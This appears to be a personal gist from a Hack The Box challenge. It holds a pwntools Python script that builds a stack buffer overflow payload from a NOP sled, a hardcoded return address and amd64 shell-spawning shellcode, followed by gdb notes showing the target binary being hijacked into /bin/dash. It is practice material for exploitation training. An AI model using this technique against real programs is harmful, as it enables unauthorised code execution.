pwntools BO EUID Exec test --

gistfile1.txt

#!usr/bin/env python
import struct
from pwn import *
 
def gen_payload(start_addr, shellcode):
        context.arch='amd64'
        # Opcode for the NOP instruction
        nop = asm('nop', arch="amd64")
        nop1 = nop*72   # Create first NOP sled
 
        # Generate the shellcode
        # p = asm(shellcode)
        p = asm(shellcraft.amd64.sh(), arch='amd64')
 
        # Append start address in little endian format
        addr = struct.pack("<Q", start_addr)
        payload = nop1 + addr + (nop*16) + p
        return payload

# ret --
# x $rsp
# 0x7fffffffcf98:   rex.WB

a = 0x7fffffffcf98+8

payload = gen_payload(a,
   shellcraft.amd64.linux.exit())
 
with open("./v_pload", "wb") as f:
        f.write(payload)

"""

__ EOF __

"""

gdb -q ./leak
m*main+64
r < v_pload
c

gdb -q ./leak
Reading symbols from ./leak...(no debugging symbols found)...done.
gdb-peda$ disa
disable      disassemble  
gdb-peda$ quit

gdb -q ./leak
Reading symbols from ./leak...(no debugging symbols found)...done.
gdb-peda$ r < v_pload 
Starting program: /home/cdowns/Documents/Hack_The_Box/Fortress/leak < v_pload
Oops, I'm leaking! 0x7fffffffcf50
Pwn me ¯\_(ツ)_/¯ 
> process 10036 is executing new program: /bin/dash
[Inferior 1 (process 10036) exited normally]
Warning: not running or target is remote
gdb-peda$